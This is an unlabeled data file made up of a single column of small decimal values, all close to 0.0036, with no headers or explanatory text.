0.00364993
0.00365929
0.00364493
0.00365118
0.00365112
0.00364914
0.00364961
0.00365582
0.0036592
0.00364675
0.00365068
0.00364985
0.0036591
0.00365437
0.00365345
0.00366028
0.00364872
0.00364529
0.00364971
0.00365592
0.00365231
0.00365411
0.00364783
0.00365718
0.00365525
0.00365406
0.00366923
0.00367488
0.00367172
0.00366513
0.00364676
0.00364844
0.00365314
0.00364959
0.00364442
0.00364833
0.00364417
0.00364637
0.00365586
0.00364718
0.00365335
0.00364077
0.00364447
0.00364149
0.00364353
0.00364524
0.00364211
0.00364609
0.00364911
0.00364679
0.00365394
0.00365884
0.00364624
0.00364994
0.00365932
0.00364501
0.00365122
0.00365126
0.00364917
0.0036497
0.00365579
0.00365965
0.00364682
0.00365067
0.0036499
0.00365903
0.00365438
0.00365353
0.00366021
0.00364883
0.00364537
0.00364984
0.00365607
0.00365251
0.00365432
0.00364793
0.00365775
0.00365528
0.0036541
0.00366893
0.00367249
0.00367182
0.00366511
0.00364694
0.00364859
0.00365312
0.0036495
0.003645
0.00365127
0.00365119
0.00364919
0.00364968
0.00365577
0.00365967
0.00364686
0.0036507
0.00364993
0.00365904
0.00365442
0.00365353
0.00366021
0.0036489
0.00364559
0.00364993
0.00365613
0.00365261
0.00365429
0.00364812
0.00365767
0.00365531
0.00365409
0.00366894
0.0036725
0.00367179
0.00366514
0.00364691
0.00364865
0.0036532
0.00364961
0.00364488
0.00365112
0.00365139
0.00364904
0.00364949
0.00365566
0.00365987
0.00364675
0.00365059
0.00364982
0.00365891
0.00365434
0.00365343
0.00366013
0.00364881
0.0036456
0.00364989
0.00365603
0.00365248
0.00365418
0.00364798
0.00365777
0.00365517
0.00365407
0.0036688
0.00367263
0.0036713
0.00366505
0.00364702
0.00364865
0.00365308
0.00364951
0.00364435
0.00364824
0.00364411
0.0036463
0.00365574
0.00364713
0.00365327
0.00364069
0.00364438
0.00364144
0.00364346
0.00364512
0.00364201
0.00364601
0.00364898
0.00364662
0.00365372
0.00365865
0.00364608
0.00364981
0.00365913
0.00364512
0.00365141
0.0036514
0.00364934
0.00364986
0.00365609
0.00365949
0.00364693
0.00365085
0.00365004
0.00365932
0.00365454
0.00365367
0.00366049
0.00364896
0.0036457
0.00365
0.00365615
0.00365253
0.00365436
0.00364799
0.00365751
0.00365543
0.00365429
0.00366946
0.00367516
0.003672
0.00366533
0.00364711
0.00364883
0.00365332
0.00364962
0.00364443
0.00364831
0.00364418
0.00364637
0.00365589
0.00364724
0.00365334
0.00364074
0.00364446
0.00364149
0.0036435
0.00364515
0.00364204
0.00364605
0.00364902
0.00364663
0.00365373
0.00365868
0.0036461
0.00364983
0.00365916
0.00364457
0.00364845
0.00364431
0.00364647
0.00365594
0.00364731
0.00365343
0.00364087
0.00364456
0.00364163
0.0036436
0.00364525
0.00364215
0.00364612
0.00364913
0.00364675
0.00365387
0.00365881
0.00364623
0.00364994
0.0036593
0.00364436
0.0036481
0.00364405
0.00364625
0.00365571
0.00364713
0.00365317
0.00364055
0.00364419
0.00364131
0.00364338
0.00364495
0.0036419
0.00364587
0.0036489
0.00364653
0.00365361
0.00365853
0.003646
0.00364972
0.003659
0.003645
0.00365137
0.00365112
0.00364926
0.00364973
0.00365593
0.00365928
0.00364685
0.00365076
0.00364995
0.00365919
0.00365445
0.00365357
0.00366039
0.00364885
0.00364557
0.00364984
0.00365601
0.00365235
0.00365425
0.00364789
0.00365744
0.00365534
0.0036542
0.00366934
0.00367506
0.00367192
0.00366524
0.00364685
0.00364857
0.00365312
0.00364918
0.00364444
0.00364833
0.00364419
0.00364637
0.00365579
0.00364722
0.00365331
0.00364076
0.00364447
0.0036415
0.00364353
0.00364517
0.00364208
0.00364605
0.0036491
0.00364675
0.00365389
0.00365878
0.00364621
0.00364991
0.00365927
0.00364458
0.00364848
0.00364432
0.00364649
0.003656
0.00364733
0.00365346
0.00364087
0.00364456
0.00364163
0.00364362
0.00364526
0.00364216
0.00364614
0.00364915
0.00364678
0.00365391
0.00365883
0.00364625
0.00364996
0.00365933
0.00364505
0.00365157
0.00365231
0.0036492
0.00364994
0.0036561
0.00366159
0.0036468
0.00365068
0.00364989
0.00365904
0.00365438
0.00365349
0.00366024
0.00364884
0.00364563
0.00365005
0.00365624
0.00365239
0.00365423
0.00364794
0.0036576
0.00365536
0.00365407
0.00366904
0.0036736
0.00367271
0.00366532
0.00364763
0.00364897
0.0036536
0.00365063
0.00364509
0.00365133
0.00365132
0.00364926
0.00364979
0.00365589
0.00365976
0.0036469
0.00365075
0.00364998
0.00365909
0.00365446
0.00365357
0.00366026
0.00364897
0.00364577
0.00365003
0.0036562
0.00365263
0.00365433
0.00364815
0.00365779
0.00365536
0.00365417
0.00366899
0.00367256
0.00367186
0.00366516
0.00364707
0.00364879
0.00365332
0.00364959
0.00366559
0.00366559
0.00367441
0.00366366
0.00366366
0.00365561
0.00365685
0.00364701
0.00364659
0.00365055
0.00364653
0.00364248
0.00364358
0.00364451
0.00364702
0.00364661
0.00365055
0.00364654
0.00364249
0.00364359
0.00364452
0.00365742
0.00365066
0.00365568
0.00365043
0.00364686
0.00365093
0.00364684
0.00365743
0.00365068
0.00365569
0.00365044
0.00364687
0.00365094
0.00364685
0.00366313
0.00364845
0.00364846
0.00365366
0.00365366
0.00365022
0.00364686
0.00366548
0.0036655
0.00367432
0.00366358
0.0036636
0.00365554
0.00365677
0.00364693
0.00364657
0.00365049
0.00364648
0.00364243
0.00364352
0.00364447
0.00364697
0.00364657
0.00365052
0.00364649
0.00364245
0.00364354
0.00364448
0.00365734
0.00365058
0.00365561
0.00365037
0.0036468
0.00365086
0.00364678
0.00365737
0.00365062
0.00365564
0.00365038
0.00364681
0.00365087
0.0036468
0.00366311
0.00364844
0.00364842
0.00365362
0.00365363
0.00365018
0.00364682
0.00365154
0.00364692
0.00363841
0.00364003
0.00364459
0.00364018
0.0036504
0.00365378
0.00364835
0.00363789
0.00363903
0.00364026
0.00365129
0.00364739
0.00364682
0.00364519
0.00363918
0.00365025
0.00364267
0.00364238
0.00363876
0.00364814
0.00364647
0.00363792
0.00363912
0.00364327
0.0036469
0.00364519
0.00363924
0.00365022
0.00364274
0.00364237
0.00363875
0.00364816
0.00364646
0.0036379
0.0036392
0.00364329
0.00366554
0.00366554
0.00367444
0.00366365
0.00366365
0.00365557
0.00365681
0.00364695
0.00364652
0.00365051
0.00364649
0.00364241
0.00364353
0.00364443
0.00364698
0.00364653
0.00365051
0.00364649
0.00364243
0.00364354
0.00364444
0.0036574
0.00365065
0.00365567
0.0036504
0.00364684
0.0036509
0.00364682
0.00365739
0.00365063
0.00365566
0.0036504
0.00364683
0.0036509
0.00364681
0.00366319
0.00364837
0.00364838
0.00365364
0.00365364
0.00365018
0.00364672
0.0036514
0.00364668
0.00363817
0.00363977
0.00364435
0.00363989
0.00365034
0.00364654
0.00364512
0.00363906
0.00365016
0.00364244
0.00364224
0.00363867
0.00364813
0.00364652
0.00363778
0.00363924
0.00364335
0.00364755
0.00364516
0.00363921
0.00365015
0.00364314
0.00364238
0.0036386
0.00364808
0.00364636
0.00363795
0.00363927
0.00364338
0.00365187
0.00364678
0.00363881
0.00363927
0.00364088
0.00363941
0.00365033
0.00366547
0.00366548
0.00367432
0.00366357
0.00366356
0.00365553
0.00365675
0.00364693
0.00364652
0.00365046
0.00364646
0.00364241
0.00364351
0.00364444
0.00364694
0.00364653
0.00365045
0.00364646
0.00364241
0.00364351
0.00364444
0.00365733
0.00365058
0.0036556
0.00365036
0.00364679
0.00365085
0.00364677
0.00365734
0.00365059
0.00365561
0.00365036
0.00364679
0.00365085
0.00364678
0.00366306
0.00364839
0.00364838
0.00365357
0.00365356
0.00365014
0.00364679
0.00365232
0.00364655
0.00363892
0.00363947
0.00364095
0.00363718
0.00365029
0.00364665
0.00364507
0.0036391
0.00365005
0.00364254
0.00364219
0.00363865
0.00364802
0.0036464
0.00363773
0.00363928
0.00364322
0.00364736
0.00364509
0.00363914
0.0036501
0.00364303
0.00364232
0.00363856
0.00364805
0.00364637
0.00363789
0.00363927
0.00364321
0.00365148
0.00364655
0.00363878
0.00363937
0.00364193
0.00363717
0.0036516
0.00364688
0.00364525
0.00363928
0.00365025
0.00364275
0.00364237
0.00363878
0.00364823
0.00364661
0.00363784
0.00363908
0.00364327
0.0036468
0.00364521
0.00363927
0.0036502
0.00364276
0.00364247
0.00363879
0.00364821
0.0036465
0.00363799
0.00363911
0.00364332
0.00365345
0.00364776
0.0036379
0.0036387
0.00363883
0.00364609
0.00364893
0.00365179
0.00364705
0.00363866
0.00363996
0.00364369
0.00363948
0.0036509
0.00363963
0.00364431
0.0036445
0.0036523
0.00364409
0.00364431
0.00365259
0.00363909
0.00364407
0.00364451
0.00365178
0.00364507
0.00364043
0.00365167
0.00364383
0.00363884
0.00364431
0.00365046
0.0036427
0.00364182
0.00365312
0.00363932
0.00363823
0.00364047
0.00364337
0.0036394
0.00364221
0.00364016
0.00365593
0.00364392
0.00365396
0.00364659
0.00365148
0.00364553
0.00365761
0.00366243
0.00364789
0.00364848
0.00366243
0.0036473
0.00365939
0.00366254
0.00364619
0.00364632
0.00365047
0.00364923
0.00364371
0.00364204
0.00364448
0.00365339
0.00365322
0.00364823
0.00364091
0.00364449
0.00363784
0.00366639
0.00364495
0.00369017
0.00363172
0.00368154
0.0036504
0.00365769
0.00365088
0.0036647
0.00365391
0.00365717
0.00364908
0.00363974
0.00364453
0.00364466
0.00365251
0.0036444
0.00364455
0.00365286
0.00364454
0.00363936
0.00364473
0.00365107
0.00364308
0.00364228
0.00365368
0.00363913
0.0036444
0.00364474
0.00365216
0.00364547
0.003641
0.00365203
0.00363862
0.00363967
0.0036409
0.00364381
0.00363968
0.00364051
0.00364257
0.00365634
0.00364416
0.00364692
0.00365427
0.00364584
0.00365177
0.00365803
0.003663
0.00364831
0.00364889
0.00366315
0.00364769
0.00365982
0.00366306
0.00364608
0.00364621
0.00365039
0.00364908
0.00364351
0.00364176
0.00364431
0.00365336
0.00365315
0.00364821
0.00364079
0.00364372
0.00364039
0.00366689
0.00364444
0.00368233
0.00363276
0.00367885
0.00365209
0.00365796
0.00365108
0.00366488
0.00365436
0.00365793
0.00364972
0.00365033
0.0036578
0.00365096
0.00366479
0.00365386
0.00365765
0.00364907
0.00365343
0.0036568
0.00365186
0.00366273
0.00365547
0.00365675
0.00363862
0.00363961
0.00364431
0.00364449
0.0036523
0.00364416
0.00364433
0.0036526
0.00363923
0.00364417
0.00364478
0.00365191
0.00364508
0.00364038
0.00365169
0.00364431
0.00363901
0.00364442
0.00365072
0.00364315
0.00364191
0.00365437
0.00363936
0.00363826
0.00364054
0.00364344
0.00363939
0.00364224
0.00364016
0.00365588
0.00364387
0.00365394
0.00364652
0.00365145
0.00364544
0.00365758
0.00366236
0.0036476
0.00364835
0.00366249
0.00364716
0.00365932
0.00366206
0.00364593
0.00364605
0.00365033
0.00364902
0.00364351
0.00364176
0.0036444
0.00365322
0.00365311
0.00364807
0.00364124
0.00364317
0.00363928
0.00368077
0.00363946
0.00367893
0.0036315
0.00367662
0.00365141
0.00365799
0.00365114
0.0036651
0.00365487
0.00365731
0.00364783
0.00363969
0.00364442
0.00364459
0.00365242
0.00364436
0.00364447
0.00365278
0.00363906
0.00364427
0.00364481
0.00365245
0.00364544
0.00364112
0.00365199
0.00364415
0.00363914
0.00364441
0.00365087
0.0036432
0.00364212
0.00365355
0.00363944
0.00363834
0.00364056
0.0036436
0.00363949
0.00364239
0.00364029
0.00365602
0.00364392
0.00365404
0.00364655
0.00365153
0.00364548
0.00365769
0.00366227
0.00364709
0.00364822
0.00366324
0.00364708
0.00365913
0.00365995
0.00364602
0.0036463
0.00365041
0.00364911
0.00364362
0.0036419
0.00364455
0.00365332
0.00365319
0.00364831
0.00364146
0.00364318
0.00363884
0.00368613
0.00363836
0.00368018
0.00363132
0.00367696
0.00363947
0.00364422
0.00364443
0.00365226
0.0036441
0.00364429
0.00365255
0.00364359
0.00363878
0.00364419
0.0036504
0.00364264
0.00364176
0.00365313
0.00363906
0.00364401
0.00364448
0.00365171
0.00364498
0.00364029
0.0036516
0.00363817
0.00363925
0.00364038
0.00364332
0.00363936
0.00364012
0.00364218
0.00365593
0.0036439
0.00364657
0.00365393
0.00364551
0.00365146
0.00365759
0.00366244
0.00364792
0.00364848
0.00366245
0.0036473
0.00365938
0.00366258
0.0036462
0.00364626
0.0036504
0.00364924
0.00364375
0.00364215
0.00364432
0.00365338
0.00365318
0.00364831
0.00364073
0.00364375
0.00363913
0.00366542
0.00364523
0.00368655
0.00363219
0.00367988
0.00363936
0.00364411
0.00364431
0.00365215
0.003644
0.0036441
0.00365245
0.00363868
0.00364372
0.00364412
0.00365169
0.00364494
0.0036403
0.00365144
0.00364428
0.00363851
0.00364394
0.00364997
0.00364236
0.00364142
0.00365261
0.00363901
0.00363797
0.00364019
0.00364313
0.00363917
0.00364197
0.00363991
0.00365586
0.00364376
0.00365376
0.00364639
0.00365132
0.00364539
0.00365739
0.00366233
0.00364792
0.00364825
0.00366184
0.00364716
0.00365914
0.00366291
0.00364568
0.00364603
0.00365021
0.00364869
0.00364294
0.00364127
0.0036443
0.00365298
0.0036529
0.00364791
0.00363869
0.00364212
0.00364595
0.00366087
0.00364867
0.00366514
0.00363397
0.00367226
0.0036507
0.00365787
0.00365093
0.00366445
0.00365413
0.00365715
0.00364961
0.00363961
0.00364419
0.00364442
0.00365223
0.00364404
0.00364419
0.0036525
0.00364368
0.00363874
0.00364401
0.00365034
0.00364253
0.00364177
0.00365291
0.00363889
0.00364389
0.00364416
0.00365137
0.00364486
0.0036401
0.00365146
0.0036381
0.0036392
0.00364029
0.00364318
0.00363932
0.00364005
0.0036421
0.00365613
0.00364391
0.00364669
0.00365392
0.0036456
0.00365147
0.00365761
0.00366311
0.00364765
0.00364871
0.0036638
0.00364755
0.00365896
0.00366286
0.00364602
0.003646
0.00365029
0.00364907
0.00364357
0.00364178
0.00364434
0.00365327
0.00365311
0.00364818
0.00364049
0.00364257
0.0036393
0.00366682
0.00364259
0.00367611
0.00363197
0.00367864
0.00363974
0.00364435
0.00364456
0.00365238
0.00364423
0.00364438
0.00365272
0.00364316
0.00363888
0.00364403
0.00365067
0.00364252
0.00364196
0.00365209
0.00363895
0.00364409
0.00364435
0.00365199
0.00364521
0.00364079
0.00365183
0.00363816
0.00363927
0.00364022
0.00364337
0.00363943
0.00364019
0.00364227
0.00365625
0.00364398
0.00364672
0.00365418
0.00364562
0.00365162
0.00365802
0.00366263
0.00364729
0.00364848
0.00366337
0.00364733
0.00365951
0.00366
0.00364624
0.00364636
0.00365044
0.00364923
0.00364369
0.0036421
0.00364431
0.00365336
0.00365319
0.00364818
0.00364004
0.00364262
0.00364257
0.00366832
0.00364333
0.00367082
0.00363309
0.00367595
0.00365454
0.00365712
0.0036531
0.00366403
0.003658
0.00365991
0.00364288
0.00365111
0.00365793
0.00365121
0.00366492
0.00365388
0.00365775
0.00364937
0.00361722
0.00362497
0.00362245
0.00362348
0.00361924
0.00362015
0.00362095
0.00361724
0.00362481
0.00362236
0.00362337
0.00362007
0.00362095
0.00361919
0.00361721
0.0036248
0.00362233
0.00362334
0.00361916
0.00362005
0.00362092
0.00361725
0.00362483
0.00362238
0.0036234
0.00362008
0.00362097
0.00361921
0.00361723
0.00362497
0.00362245
0.00362349
0.00362016
0.00361925
0.00362096
0.00361718
0.00362488
0.0036224
0.00362339
0.00362011
0.00362082
0.0036192
0.00361726
0.00362485
0.00362239
0.0036234
0.0036201
0.00361922
0.00362097
0.00361724
0.00362498
0.00362247
0.00362351
0.00362017
0.00362097
0.00361927
0.00361764
0.00362076
0.00362363
0.00361818
0.00362177
0.00361848
0.00361761
0.00361925
0.00362106
0.00361772
0.00361583
0.00361561
0.00362253
0.00361869
0.00361766
0.00362077
0.00362364
0.00361819
0.00362179
0.00361849
0.00361763
0.00361924
0.00362105
0.0036177
0.00361581
0.0036156
0.0036225
0.00361868
0.00362042
0.00362873
0.00362311
0.00362312
0.00362383
0.00362384
0.00362049
0.0036204
0.0036287
0.00362311
0.0036231
0.00362382
0.00362381
0.00362048
0.00357753
0.0035984
0.00363592
0.00363579
0.0035764
0.00360083
0.00363408
0.00364956
0.00361553
0.00361479
0.00361292
0.00361005
0.00361694
0.00361281
0.00361266
0.00361545
0.00361481
0.00361282
0.00361002
0.00361688
0.00361279
0.00361256
0.00360973
0.00361411
0.00362017
0.00360233
0.00361274
0.0036098
0.00361423
0.00362035
0.0036023
0.00361288
0.00361766
0.00362077
0.00362363
0.00361819
0.00362179
0.00361849
0.00361763
0.00361925
0.00362106
0.00361772
0.00361582
0.00362252
0.00361561
0.00361869
0.00361763
0.00362074
0.00362357
0.00361816
0.00362175
0.00361845
0.0036176
0.00361921
0.00362103
0.0036158
0.00361769
0.00361559
0.00361865
0.00362248
0.00361629
0.00361358
0.0036137
0.00360977
0.00361755
0.00361212
0.00361329
0.00362749
0.00361469
0.00362123
0.00361537
0.00360908
0.00356646
0.00355411
0.00360329
0.00361631
0.0036135
0.00361352
0.00360972
0.00361754
0.0036121
0.00361322
0.00362776
0.00361487
0.0036217
0.00361556
0.00360989
0.00356768
0.00360419
0.00355546
0.00361546
0.00362261
0.0036167
0.00361765
0.00361797
0.00361904
0.00361461
0.00361546
0.00362253
0.00361668
0.00361762
0.00361793
0.00361902
0.0036146
0.00362041
0.00362873
0.00362311
0.00362312
0.00362383
0.00362383
0.00362049
0.00357751
0.00359857
0.00363585
0.00363567
0.0036155
0.00361003
0.00361477
0.0036129
0.00361691
0.00361279
0.00361264
0.00361595
0.00361874
0.00361119
0.00361193
0.00361356
0.00361922
0.00361461
0.0036097
0.0036141
0.00362018
0.00360209
0.00361276
0.00360977
0.00361405
0.00362011
0.00360226
0.00361271
0.00357692
0.00359791
0.00364286
0.00365768
0.00361764
0.00362076
0.00362364
0.00361816
0.0036218
0.00361847
0.0036176
0.0036192
0.00362101
0.00361767
0.00361578
0.00362246
0.00361557
0.00361864
0.00361763
0.00362073
0.00362357
0.00361816
0.00362175
0.00361845
0.0036176
0.00361922
0.00362103
0.0036158
0.00361769
0.00361559
0.00361866
0.00362248
0.00361575
0.00361419
0.00361324
0.00360972
0.00361695
0.0036122
0.00361306
0.00362782
0.00361552
0.00362205
0.00361572
0.0036099
0.0035676
0.00355544
0.00360425
0.00361542
0.00362252
0.00361665
0.0036176
0.00361791
0.003619
0.00361456
0.00361634
0.00361362
0.00361364
0.00360982
0.0036176
0.00361217
0.0036133
0.00362799
0.00361494
0.00362142
0.0036157
0.00361001
0.00356745
0.003604
0.00355543
0.00361546
0.00362253
0.00361667
0.00361764
0.00361793
0.00361905
0.0036146
0.00361758
0.00362068
0.00362354
0.00361811
0.00362171
0.00361841
0.00361755
0.0036192
0.00362101
0.00361768
0.00361578
0.00362247
0.00361557
0.00361863
0.00361545
0.0036226
0.0036167
0.00361764
0.00361797
0.0036146
0.00361903
0.00361629
0.00361357
0.00361362
0.00360975
0.00361326
0.00361746
0.00361208
0.00362737
0.00361465
0.00362141
0.00361543
0.00360904
0.00356636
0.00355413
0.00360333
0.00361542
0.0036225
0.00361668
0.00361743
0.00361793
0.00361455
0.00361888
0.00361636
0.00361349
0.00361364
0.00360979
0.00361323
0.00361784
0.00361217
0.00362734
0.00361464
0.00362092
0.00361538
0.00360916
0.00356629
0.00360308
0.00355384
0.0036204
0.0036287
0.00362309
0.00362309
0.00362381
0.00362381
0.00362047
0.00357783
0.00360009
0.00364373
0.00365741
0.00361545
0.00360998
0.0036147
0.00361275
0.00361684
0.00361275
0.00361256
0.00361593
0.00361858
0.00361119
0.00361194
0.00361358
0.00361913
0.00361458
0.00360978
0.00361408
0.00362016
0.00360253
0.00361262
0.0036098
0.00361413
0.00362001
0.00360271
0.00361269
0.00357719
0.00359823
0.00364134
0.00364821
0.00361767
0.00362078
0.00362365
0.0036182
0.0036218
0.0036185
0.00361763
0.00361927
0.00362108
0.00361773
0.00361584
0.00362254
0.00361563
0.0036187
0.00361548
0.00362255
0.0036167
0.00361763
0.00361795
0.00361462
0.00361904
0.00361546
0.00362261
0.0036167
0.00361765
0.00361798
0.00361461
0.00361905
0.00361645
0.00361364
0.00361365
0.00360982
0.00361331
0.00361774
0.00361218
0.00362785
0.0036149
0.00362176
0.00361562
0.00360997
0.00356753
0.00355539
0.00360419
0.00361648
0.00361366
0.00361362
0.00360979
0.00361329
0.00361778
0.00361218
0.00362747
0.00361474
0.00362143
0.00361537
0.00360913
0.00356633
0.00360341
0.00355407
0.00361538
0.0036147
0.00360985
0.00361268
0.00361691
0.00361269
0.00361209
0.00361599
0.00361875
0.00361198
0.00361123
0.00361463
0.00361332
0.0036193
0.00361604
0.00361874
0.00361196
0.00361119
0.00361464
0.00361332
0.00361921
0.00360971
0.00361395
0.00362004
0.00360252
0.00361247
0.00360962
0.00361391
0.00361982
0.00360259
0.00361241
0.00357648
0.00359759
0.00364202
0.00365811
0.00357699
0.00359786
0.00363787
0.00364044
0.00363829
0.00364211
0.00363527
0.00363743
0.00364085
0.00363866
0.00363559
0.00364358
0.00364722
0.00365056
0.00364799
0.00364734
0.00364613
0.00364362
0.00363841
0.00364224
0.00363536
0.00363755
0.00364099
0.00363876
0.00363569
0.00364369
0.00364741
0.00365085
0.0036481
0.00364749
0.0036463
0.00364373
0.00363838
0.00364221
0.00363753
0.00363534
0.00364096
0.00363874
0.00363567
0.00364364
0.00364736
0.00365075
0.00364805
0.00364743
0.00364623
0.00364369
0.00363827
0.00364211
0.00363742
0.00363525
0.00364086
0.00363864
0.00363557
0.00364356
0.00364724
0.00365076
0.00364793
0.00364736
0.00364618
0.00364359
0.00363086
0.00362951
0.00363074
0.00363359
0.00363069
0.00363233
0.003631
0.00363067
0.00362924
0.0036305
0.00363331
0.00363046
0.00363204
0.00363084
0.00363787
0.00363903
0.00364267
0.00363888
0.0036366
0.00363979
0.00364118
0.00362981
0.00363278
0.00363608
0.00362968
0.00362951
0.0036368
0.00363161
0.00363765
0.00363883
0.00364251
0.00363869
0.00363638
0.00363962
0.00364096
0.00362938
0.0036324
0.00363579
0.00362925
0.00362914
0.00363644
0.00363112
0.00363829
0.00364213
0.00363528
0.00363746
0.00364087
0.00363865
0.0036356
0.00364354
0.0036472
0.00365052
0.00364789
0.00364731
0.0036461
0.00364357
0.00363838
0.00364219
0.00363534
0.00363751
0.00364094
0.00363873
0.00363567
0.00364368
0.00364732
0.00365075
0.00364806
0.00364749
0.00364625
0.0036437
0.00363067
0.0036293
0.0036333
0.00363056
0.00363208
0.0036305
0.0036308
0.00363093
0.00362955
0.0036308
0.00363366
0.00363075
0.00363238
0.0036311
0.00363763
0.00363886
0.00364251
0.00363861
0.00363635
0.00363963
0.00364094
0.00362938
0.00363241
0.00363578
0.00362922
0.00362912
0.00363645
0.0036311
0.00363769
0.00363889
0.00364254
0.0036387
0.00363641
0.00363966
0.00364101
0.00362944
0.00363248
0.00363588
0.00362927
0.00362918
0.00363654
0.00363117
0.00363788
0.00363905
0.00364269
0.00363884
0.00363661
0.00363982
0.00364117
0.00362985
0.00363285
0.00363619
0.00362972
0.00362956
0.00363688
0.00363165
0.00363755
0.00363877
0.00364228
0.00363854
0.00363632
0.00363948
0.00364075
0.0036294
0.00363238
0.00363566
0.00362941
0.00362924
0.00363633
0.00363119
0.00363832
0.00364216
0.00363529
0.00363747
0.0036409
0.00363869
0.00363561
0.00364361
0.00364733
0.0036508
0.00364802
0.00364742
0.00364623
0.00364365
0.00363833
0.00364213
0.00363529
0.00363747
0.00364089
0.00363867
0.00363562
0.00364361
0.00364725
0.00365069
0.00364798
0.00364742
0.00364618
0.00364363
0.00363067
0.00362933
0.00363335
0.00363063
0.0036321
0.00363055
0.00363082
0.0036307
0.00362934
0.00363061
0.00363335
0.00363056
0.00363212
0.00363083
0.00363771
0.00363893
0.00364257
0.00363871
0.00363643
0.00363969
0.00364102
0.00362942
0.00363247
0.00363588
0.00362928
0.00362919
0.00363654
0.00363115
0.00363789
0.00363908
0.00364271
0.00363883
0.00363661
0.00363983
0.00364117
0.00362984
0.00363282
0.00363614
0.0036297
0.00362955
0.00363684
0.00363163
0.00363076
0.00362936
0.00363348
0.00363066
0.00363216
0.00363058
0.00363095
0.00363091
0.00362955
0.00363362
0.00363078
0.00363237
0.00363074
0.00363102
0.00364354
0.00363835
0.0036443
0.00365159
0.0036432
0.0036432
0.00365145
0.00364368
0.0036384
0.00364439
0.00365175
0.0036432
0.00364337
0.00365169
0.00364361
0.00363826
0.00364423
0.00365157
0.00364306
0.00364325
0.00365162
0.00364363
0.00363837
0.00364437
0.00365168
0.00364326
0.0036433
0.00365156
0.00364347
0.00363817
0.0036442
0.00365155
0.003643
0.00364316
0.00365149
0.0036435
0.00363803
0.0036441
0.00365142
0.00364278
0.00364293
0.00365152
0.00364357
0.00363831
0.00364425
0.00365154
0.00364306
0.00364305
0.00365156
0.00364359
0.00363839
0.00364433
0.00365163
0.00364324
0.00364327
0.0036515
0.00364793
0.00364588
0.00364443
0.00364094
0.00364442
0.00365011
0.00364374
0.00365299
0.00364883
0.0036602
0.00365177
0.00365778
0.00365516
0.0036484
0.00364805
0.00364602
0.00364449
0.00364109
0.00364461
0.00365013
0.00364388
0.00365303
0.00364884
0.00366017
0.00365185
0.00365787
0.00365503
0.00364849
0.00364798
0.00364599
0.00364446
0.00364108
0.0036446
0.00365008
0.00364383
0.00365281
0.00364874
0.00365979
0.00365169
0.00365743
0.00365488
0.00364837
0.00364794
0.00364588
0.00364441
0.00364096
0.0036445
0.00365
0.00364375
0.00365291
0.00364876
0.0036601
0.00365177
0.00365781
0.00365493
0.0036484
0.00362965
0.00363568
0.00363824
0.00362721
0.00363731
0.00363045
0.00362492
0.0036229
0.00361871
0.00362064
0.00362154
0.00362649
0.00361908
0.00361551
0.00362617
0.00362594
0.00362764
0.00362905
0.00362815
0.00362585
0.00362646
0.00364104
0.00364044
0.003642
0.00363251
0.00364327
0.00364378
0.0036316
0.00363765
0.00363542
0.00362186
0.00362172
0.00363068
0.00362696
0.00363943
0.00363242
0.003633
0.00363675
0.00363626
0.00362354
0.00363272
0.0036141
0.0036221
0.0036248
0.00363352
0.00362087
0.00362151
0.00359571
0.00358374
0.00362965
0.00363554
0.00363823
0.00362724
0.00363727
0.00363042
0.00362489
0.0036229
0.0036187
0.00362057
0.00362173
0.00362643
0.0036191
0.00361564
0.00362582
0.00362571
0.00362748
0.00362836
0.00362806
0.00362565
0.00362598
0.0036409
0.00364041
0.00364182
0.00363217
0.00364315
0.00364364
0.00363151
0.00363739
0.00363548
0.00362161
0.00362182
0.00363097
0.00362648
0.00363936
0.00363238
0.00363264
0.0036369
0.00363615
0.00362313
0.00363665
0.00361284
0.00362079
0.00362355
0.00363299
0.00361727
0.00362023
0.00359484
0.00357933
0.00364803
0.00364597
0.0036445
0.00364103
0.00364454
0.0036502
0.00364383
0.00365308
0.00364889
0.00366028
0.00365184
0.00365786
0.00365526
0.00364847
0.00364799
0.00364597
0.00364445
0.00364105
0.00364457
0.00365008
0.00364381
0.00365294
0.00364878
0.00366013
0.00365177
0.00365779
0.00365498
0.0036484
0.00362983
0.00363588
0.00363856
0.0036276
0.00363751
0.00363071
0.00362514
0.0036229
0.00361873
0.00362052
0.00362143
0.00362652
0.00361899
0.00361547
0.00362857
0.00362673
0.00363247
0.00362774
0.00362816
0.00362956
0.00362645
0.00364085
0.0036402
0.00364175
0.00363235
0.00364282
0.00364352
0.0036316
0.00363738
0.00363537
0.0036218
0.0036219
0.00363096
0.00362657
0.00363914
0.00363239
0.00363287
0.00363697
0.00363617
0.00362329
0.00363619
0.00361264
0.00361964
0.00362502
0.00363421
0.00361539
0.0036202
0.00359519
0.0035805
0.0036297
0.0036358
0.00363836
0.00362737
0.00363738
0.00363052
0.00362494
0.0036229
0.00361872
0.0036205
0.00362168
0.00362646
0.0036191
0.00361544
0.003626
0.00362596
0.0036277
0.00362859
0.00362803
0.00362582
0.00362622
0.00364091
0.00364034
0.00364187
0.00363239
0.00364282
0.00364355
0.00363163
0.00363744
0.00363541
0.00362195
0.00362213
0.00363101
0.00362702
0.0036394
0.00363243
0.00363308
0.00363689
0.00363624
0.00362359
0.00363095
0.00361432
0.0036215
0.00362428
0.00363367
0.00362376
0.00362212
0.00359514
0.00358065
0.00362961
0.00363569
0.00363821
0.00362722
0.00363726
0.0036304
0.00362493
0.00362283
0.00361868
0.00362045
0.00362158
0.00362641
0.00361905
0.00361534
0.00362599
0.0036258
0.0036288
0.00362751
0.00362812
0.00362628
0.00362572
0.00364104
0.00364035
0.00364196
0.00363237
0.00364304
0.00364372
0.0036315
0.00363756
0.00363548
0.00362182
0.0036217
0.00363076
0.00362657
0.00363926
0.0036323
0.00363274
0.0036368
0.00363626
0.00362333
0.00363624
0.0036133
0.00362131
0.00362406
0.00363286
0.00361624
0.00362046
0.00359524
0.00358126
0.00362946
0.0036355
0.00363808
0.00362704
0.00363713
0.00363023
0.00362474
0.00362272
0.00361849
0.00362038
0.00362137
0.00362628
0.00361888
0.0036154
0.00362597
0.00362562
0.00362713
0.00362811
0.00362723
0.00362558
0.00362598
0.00364042
0.0036401
0.00364139
0.00363162
0.00364334
0.00364306
0.0036309
0.00363678
0.00363484
0.00362202
0.00361738
0.00362999
0.00361918
0.00364001
0.00363206
0.00363135
0.00363683
0.00363416
0.00362273
0.00364976
0.00361227
0.00360881
0.00361774
0.00363306
0.00357953
0.00361086
0.00358704
0.00356827
0.00364794
0.00364593
0.0036444
0.00364099
0.00364451
0.00365003
0.00364377
0.00365286
0.00364873
0.00366003
0.0036517
0.0036577
0.00365491
0.00364836
0.00364798
0.00364592
0.00364441
0.00364101
0.00364453
0.00365002
0.00364379
